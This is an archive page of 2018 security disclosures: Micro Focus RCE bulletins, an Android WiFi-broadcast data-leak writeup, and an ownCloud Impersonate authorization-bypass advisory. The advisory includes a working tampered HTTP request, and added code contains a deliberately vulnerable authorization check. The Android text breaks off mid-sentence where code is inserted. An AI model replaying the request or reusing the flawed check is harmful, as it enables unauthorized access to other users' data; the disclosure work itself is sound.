[security bulletin] MFSBGN03821 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized suite, Remote Code Execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236725

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236725
Version: 1

MFSBGN03821 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized
suite, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Container
Deployment Foundation (CDF), available as part of the Micro Focus Hybrid Cloud
Management (HCM) containerized suite.
The vulnerability could be exploited to achieve remote code execution.

References:

  - PSRT110628
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Hybrid Cloud Management containerized suites HCM2017.11,
HCM2018.02, HCM2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus Hybrid
Cloud Management containerized suites:
Please go to the link:
https://softwaresupport.softwaregrp.com/km/KM03235997

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Micro Focus products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do
not have a Passport account yet, you can create one - it's free and easy:
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to
maintain system integrity. Micro Focus is continually reviewing and enhancing
the security features of software products to provide customers with current
secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring
to the attention of users of the affected Micro Focus products the important
security information contained in this Bulletin. Micro Focus recommends that
all users determine the applicability of this information to their individual
situations and take appropriate action. Micro Focus does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, Micro Focus will not be responsible for any damages resulting
from user's use or disregard of the information provided in this Security
Bulletin. To the extent permitted by law, Micro Focus disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose, title and
non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions
contained herein. The information provided is provided "as is" without
warranty of any kind. To the extent permitted by law, neither Micro Focus nor
its affiliates, subcontractors or suppliers will be liable for incidental,
special or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or services; or
damages for loss of data, or software restoration. The information in this
document is subject to change without notice. Micro Focus and the names of
Micro Focus products referenced herein are trademarks of

[security bulletin] MFSBGN03820 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized suites, remote code execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236722

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236722
Version: 1

MFSBGN03820 rev.1 - Micro Focus Hybrid Cloud Management (HCM) containerized
suites, remote code execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Autopass License
Server (APLS), available as part of the Micro Focus Hybrid Cloud Management
(HCM) containerized suites.
The vulnerability could be exploited to achieve remote code execution.

References:

  - PSRT110627
  - CVE-2018-6499

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Hybrid Cloud Management containerized suites 2017.08,
2017.11, 2018.02, 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue to cyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus Hybrid
Cloud Management containerized suites:

HCM 2018.08 has the required fix. Customers who are on HCM2017.08 or higher
are required to upgrade to HCM 2018.08 using the supported upgrade path.

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release


[security bulletin] MFSBGN03818 rev.1 - Micro Focus Operations Bridge containerized suite, Remote Code Execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236678

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236678
Version: 1

MFSBGN03818 rev.1 - Micro Focus Operations Bridge containerized suite, Remote
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Container
Deployment Foundation (CDF), available as part of the Micro Focus Operations
Bridge containerized suite.
The vulnerability could be exploited to achieve remote code execution.

References:

  - PSRT110626
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Operations Bridge containerized suite 2017.11, 2018.02,
2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability:
Please run the script available at the link
https://softwaresupport.softwaregrp.com/group/softwaresupport/search-result/-/facetsearch/document/KM03208993

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release


[security bulletin] MFSBGN03815 rev.1 - Data Center Automation Containerized (DCA) suite, remote code execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236669

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236669
Version: 1

MFSBGN03815 rev.1 - Data Center Automation Containerized (DCA) suite, remote
code execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified in Micro Focus Autopass
License Server (APLS) and Container Deployment Foundation (CDF), available as
part of the Micro Focus Data Center Automation Containerized (DCA) suite.
The vulnerabilities could be exploited to achieve remote code execution.

References:

  - PSRT110625
  - CVE-2018-6498
  - CVE-2018-6499

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Data Center Automation Containerized (DCA) suite, from 2017.01
up to and including 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue to cyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Data Center
Automation:
Update your DCA Containerized product to DCA Containerized 2018.08 or above
and use the link below to get the script for updating your system:


HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release


[security bulletin] MFSBGN03814 rev.1 - Service Management Automation (SMA) containerized, Remote Code Execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236667

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236667
Version: 1

MFSBGN03814 rev.1 - Service Management Automation (SMA) containerized, Remote
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified in Micro Focus Autopass
License Server (APLS) and Container Deployment Foundation (CDF), available as
part of the Micro Focus Service Management Automation (SMA) containerized suites.
The vulnerabilities could be exploited to achieve remote code execution.

References:

  - PSRT110624
  - CVE-2018-6499
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Service Management Automation (SMA) 2017.11, 2018.02, 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue to cyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Micro Focus Service
Management Automation (SMA) containerized:

For SMA 2017.11 patch releases: KM03210103
https://softwaresupport.softwaregrp.com/km/KM03210103

For SMA 2018.05 patch releases: KM03204500
https://softwaresupport.softwaregrp.com/km/KM03204500

For SMA 2018.02 patch releases: KM03146621
https://softwaresupport.softwaregrp.com/km/KM03146621

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release

[security bulletin] MFSBGN03817 rev.1 - Operations Bridge containerized suite, Remote Code Execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236648

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236648
Version: 1

MFSBGN03817 rev.1 - Operations Bridge containerized suite, Remote Code
Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified in Micro Focus Autopass License
Server (APLS), available as part of the Micro Focus Operations Bridge
containerized suite. The vulnerability could be exploited to achieve remote
code execution.

References:

  - PSRT110623
  - CVE-2018-6499

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Micro Focus Operations Bridge containerized suite 2018.05 (component:
Autopass License Server 10.6.0 and below)

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue to cyber-p...@microfocus.com.

RESOLUTION

Micro Focus has made the following mitigation information available to
resolve the vulnerability for the impacted versions of Autopass License
Server: the defect is fixed in the OpsBridge Suite 2018.05.001 patch
(OPSB_1):


HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release


[security bulletin] MFSBGN03813 rev.1 - Network Operations Management (NOM) Suite CDF, Remote Code Execution

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03236632

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03236632
Version: 1

MFSBGN03813 rev.1 - Network Operations Management (NOM) Suite CDF, Remote
Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-30
Last Updated: 2018-08-30

Potential Security Impact: Remote: Code Execution

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified in Micro Focus Autopass
License Server (APLS) and Container Deployment Foundation (CDF), available as
part of Micro Focus Network Operations Management (NOM) Suite CDF.
The vulnerabilities could be exploited to achieve remote code execution.

References:

  - PSRT110621
  - CVE-2017-5647
  - CVE-2018-6498

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - Network Operations Management (NOM) Suite 2017.11, 2018.02, and 2018.05

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


Micro Focus would like to thank Lukasz Mikula for reporting the AutoPass
License Server issue to cyber-p...@microfocus.com.

RESOLUTION

Micro Focus requests its customers to replace the 2017.11, 2018.02 and 2018.05
versions of NOM Suite CDF with a fresh install of the 2018.08 version of NOM
Suite CDF.

HISTORY
Version:1 (rev.1) - 30 August 2018 Initial release


Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]

2018-08-30 Thread research
[Blog post here:
https://wwws.nightwatchcybersecurity.com/2018/08/29/sensitive-data-exposure-via-wifi-broadcasts-in-android-os-cve-2018-9489/]

TITLE

Sensitive Data Exposure via WiFi Broadcasts in Android OS [CVE-2018-9489]

SUMMARY

System broadcasts by Android OS expose information about the user’s
device to all applications running on the device. This includes the
WiFi network name, BSSID, local IP addresses, DNS server information
and the MAC address. Some of this information (MAC address) is no
longer available via APIs on Android 6 and higher, and extra
permissions are normally required to access the rest of this
information. However, by listening to these broadcasts, any
application on the device can capture this information thus bypassing
any permission checks and existing mitigations.

Because MAC addresses do not change and are tied to hardware, this can
be used to uniquely identify and track any Android device even when
MAC address randomization is used. The network name and BSSID can be
used to geolocate users via a lookup against a database of BSSID such
as WiGLE or SkyHook. Other networking information can be used by rogue
apps to further explore and attack the local WiFi network.

All versions of Android running on all devices are believed to be
affected including forks (such as Amazon’s FireOS for the Kindle). The
vendor (Google) fixed these issues in Android P / 9 but does not plan
to fix older versions. Users are encouraged to upgrade to Android P /
9 or later. CVE-2018-9489 has been assigned by the vendor to track
this issue. Further research is also recommended to determine whether
this is being exploited in the wild.

BACKGROUND

Android is an open source operating system developed by Google for
mobile phones and tablets. It is estimated that over two billion
devices exist worldwide running Android. Applications on Android are
usually segregated by the OS from each other and the OS itself.
However, interaction between processes and/or the OS is still possible
via several mechanisms.

In particular, Android provides the use of “Intents” as one of the
ways for inter-process communication. A broadcast using an “Intent”
allows an application or the OS to send a message system-wide which
can be listened to by other applications. While functionality exists
to restrict who is allowed to read such messages, application
developers often neglect to implement these restrictions properly or
mask sensitive data. This leads to a common vulnerability within
Android applications where a malicious application running on the same
device can spy on and capture messages being broadcast by other
applications.

Another security mechanism present in Android is permissions.
These are safeguards designed to protect the privacy of users.
Applications must explicitly request access to certain information or
features via a special “uses-permission” tag in the application
manifest (“AndroidManifest.xml”). Depending on the type of permission
(“normal”, “dangerous”, etc.) the OS may display the permission
information to the user during installation, or may prompt again
during run-time. Some permissions can only be used by system
applications and cannot be used by regular developers.

VULNERABILITY DETAILS

Android OS broadcasts information about the WiFi connection and the
WiFi network interface on a regular basis using two intents:
WifiManager’s NETWORK_STATE_CHANGED_ACTION and WifiP2pManager’s
WIFI_P2P_THIS_DEVICE_CHANGED_ACTION. This information includes the MAC
address of the device, the BSSID and network name of the WiFi access
point, and various networking information such as the local IP range,
gateway IP and DNS server addresses. This information is available to
all applications running on the user’s device.

While applications can also access this information via the
WifiManager, this normally requires the “ACCESS_WIFI_STATE” permission
in the application manifest. Geolocation via WiFi normally requires
the “ACCESS_FINE_LOCATION” or “ACCESS_COARSE_LOCATION” permissions.
Also, on Android versions 6.0 and later, the real MAC address of the
device is no longer available via APIs and will always return the
address “02:00:00:00:00:00”. However, an application listening for
system broadcasts does not need these permissions, thus allowing this
information to be captured without the knowledge of the user, and the
real MAC address to be captured even on Android 6 or higher.

We performed testing using a test farm of mobile devices ranging across
multiple types of hardware and Android versions. All devices and
versions of Android tested confirmed this behavior, although some
devices do not display the real MAC address in the
“NETWORK_STATE_CHANGED_ACTION” intent but they still do within the
“WIFI_P2P_THIS_DEVICE_CHANGED_ACTION” intent. We also tested at least
one fork (Amazon’s FireOS for the Kindle) and those devices displayed
the same behavior.

Because MAC addresses do not change and are tied to hardware, 
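An app-vetting check for the broadcasts discussed in the post, added here as an example and not code from the original post: it flags manifest receivers subscribed to the two WiFi actions and reports whether the app even declares ACCESS_WIFI_STATE. The manifest is constructed; the action strings are the values of the two named constants, and receivers registered at run time with registerReceiver() are not covered because they do not appear in the manifest.

```python
"""Vetting heuristic for CVE-2018-9489-style listeners.  Added example,
not the researcher's code.  Flags manifest receivers that listen for
WifiManager.NETWORK_STATE_CHANGED_ACTION or
WifiP2pManager.WIFI_P2P_THIS_DEVICE_CHANGED_ACTION and notes whether
ACCESS_WIFI_STATE is declared at all.  Receivers registered in code via
registerReceiver() are not visible here; a full review also greps the
decompiled sources for the same action strings."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"

# Intent action strings behind the two constants discussed in the post.
WIFI_BROADCASTS = {
    "android.net.wifi.STATE_CHANGE",             # NETWORK_STATE_CHANGED_ACTION
    "android.net.wifi.p2p.THIS_DEVICE_CHANGED",  # WIFI_P2P_THIS_DEVICE_CHANGED_ACTION
}
WIFI_PERMISSION = "android.permission.ACCESS_WIFI_STATE"

# Constructed manifest: an app with no WiFi permission that still
# subscribes to both system broadcasts.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <receiver android:name=".WifiInfoReceiver">
      <intent-filter>
        <action android:name="android.net.wifi.STATE_CHANGE"/>
        <action android:name="android.net.wifi.p2p.THIS_DEVICE_CHANGED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""


def audit_manifest(xml_text):
    """Return {'declares_wifi_permission': bool,
               'wifi_listeners': {receiver_name: [matching actions]}}."""
    root = ET.fromstring(xml_text)
    declared = {p.get(NAME) for p in root.iter("uses-permission")}
    listeners = {}
    for receiver in root.iter("receiver"):
        actions = [a.get(NAME) for a in receiver.iter("action")]
        hits = sorted(a for a in actions if a in WIFI_BROADCASTS)
        if hits:
            listeners[receiver.get(NAME)] = hits
    return {"declares_wifi_permission": WIFI_PERMISSION in declared,
            "wifi_listeners": listeners}


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    for name, actions in report["wifi_listeners"].items():
        print(f"{name} listens for {', '.join(actions)}; "
              f"ACCESS_WIFI_STATE declared: {report['declares_wifi_permission']}")
```

A receiver that subscribes to these actions while the app declares no WiFi or location permission is exactly the pattern the post describes and deserves a closer look during review.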

[security bulletin] MFSBGN03812 rev.1 - Application Performance Management, remote cross-site tracing

2018-08-30 Thread cyber-psrt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://softwaresupport.hpe.com/document/-/facetsearch/document/KM03235847

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: KM03235847
Version: 1

MFSBGN03812 rev.1 - Application Performance Management, remote cross-site
tracing

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2018-08-29
Last Updated: 2018-08-29

Potential Security Impact: Remote: Disclosure of Information

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in Micro Focus
Application Performance Management. The vulnerability could be remotely
exploited to allow cross-site tracing and Remote Disclosure of Information.

References:

  - PSRT110566
  - CVE-2007-3008
  - CVE-2004-2320

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Application Performance Management (APM) 9.25, 9.26, 9.30, 9.40, 9.50

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Micro Focus has made the following software updates and mitigation information
available to resolve the vulnerability in Application Performance Management.
Please go to the link below:


HISTORY
Version:1 (rev.1) - 29 August 2018 Initial release


CSNC-2018-015 - ownCloud Impersonate - Authorization Bypass

2018-08-30 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  ownCloud Impersonate
# Vendor:   ownCloud
# CSNC ID:  CSNC-2018-015
# CVE ID:   N/A
# Subject:  Authorization bypass
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz 
# Date:     29.08.2018
#
#


Introduction:
-
ownCloud [1] is a suite of client-server software for creating file hosting 
services and using them. An app called Impersonate [2] was created to allow 
administrators to impersonate other users.

According to the documentation [3], group admins should only be able to access 
users of the groups they are administrator of.

Compass Security discovered that it was possible for a group admin to 
impersonate any user, except global administrators.

This way, group admins have access to data of users of other groups, even 
though they shouldn't.


Affected:
-
Vulnerable:
 * Version 0.1.2

Not vulnerable:
 * Version 0.2.0

No other version was tested, but it is believed that older versions are
vulnerable too.


Technical Description
-
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
 * group1
 * group2

Create four users as follows:
 * test1; group = group1; group admin = group1
 * test2; group = group1; group admin = no group
 * test3; group = group2; group admin = group2
 * test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group admins 
to impersonate users from these groups" and add the two groups "group1" and 
"group2".

Log in with "test1", open the user page and impersonate the user "test2". 
There, intercept the POST request to /apps/impersonate/user and replace 
"target=test2" by "target=test3" in the body as shown below.

As a result, the user "test1" will impersonate the user "test3", even though 
"test1" is only group admin of "group1" and "test3" is not in this group.

Request:
=
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
=

Response:
=
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 
'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: 
blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=


Workaround / Fix:
-
Check the authorization consistently to prevent group admins from being able
to impersonate users from other groups.


Timeline:
-
2018-08-29: Coordinated public disclosure date
2018-04-17: Release of fixed version 0.2.0
2018-03-16: Initial vendor response
2018-03-16: Initial vendor notification
2018-03-15: Discovery by Thierry Viaccoz


References:
---
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html
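The authorization check the Technical Description and the Workaround / Fix call for, modelled as an added example that is not ownCloud's code: a small in-memory directory mirroring the advisory's two groups and four users, the check that 0.1.2 effectively applied (target is not a global admin) beside a consistent check that requires the target to be in a group the actor administers, and a handler for the POST /apps/impersonate/user body. The "admin" user and the JSON error bodies are constructed.

```python
"""Authorization for POST /apps/impersonate/user (body "target=<uid>").
Added example, not ownCloud's code.  The directory mirrors the
advisory's reproduction setup; "admin" is a constructed global admin."""
from urllib.parse import parse_qsl

GLOBAL_ADMINS = {"admin"}
USER_GROUPS = {            # user -> groups the user belongs to
    "admin": set(),
    "test1": {"group1"}, "test2": {"group1"},
    "test3": {"group2"}, "test4": {"group2"},
}
GROUP_ADMIN_OF = {         # user -> groups the user administers
    "test1": {"group1"}, "test3": {"group2"},
}
# "Allow group admins to impersonate users from these groups" setting.
ALLOWED_GROUPS = {"group1", "group2"}


def vulnerable_check(actor, target):
    """Behaviour described for 0.1.2: any group admin may impersonate
    anyone who is not a global admin; the actor's own groups are ignored."""
    is_group_admin = bool(GROUP_ADMIN_OF.get(actor))
    return actor in GLOBAL_ADMINS or (is_group_admin and target not in GLOBAL_ADMINS)


def fixed_check(actor, target):
    """Consistent authorization: global admins are never impersonable; a
    global admin may impersonate any other user; a group admin may only
    impersonate a target sharing a group the actor administers AND that
    is in the allowed list."""
    if actor == target or target in GLOBAL_ADMINS:
        return False
    if actor in GLOBAL_ADMINS:
        return True
    reachable = GROUP_ADMIN_OF.get(actor, set()) & ALLOWED_GROUPS
    return bool(reachable & USER_GROUPS.get(target, set()))


def handle_impersonate(actor, body, check=fixed_check):
    """Model of the controller: parse the form body, authorize server-side
    (never trust the client-side user list), return (status, body).
    200 "[]" mirrors the success response shown in the advisory."""
    target = dict(parse_qsl(body)).get("target", "")
    if target not in USER_GROUPS:
        return 404, '{"error":"unknown user"}'
    if not check(actor, target):
        return 403, '{"error":"not authorized to impersonate this user"}'
    return 200, "[]"


if __name__ == "__main__":
    # The advisory's tampered request: test1 (admin of group1) -> test3 (group2)
    print("0.1.2:", handle_impersonate("test1", "target=test3", check=vulnerable_check))
    print("fixed:", handle_impersonate("test1", "target=test3"))
```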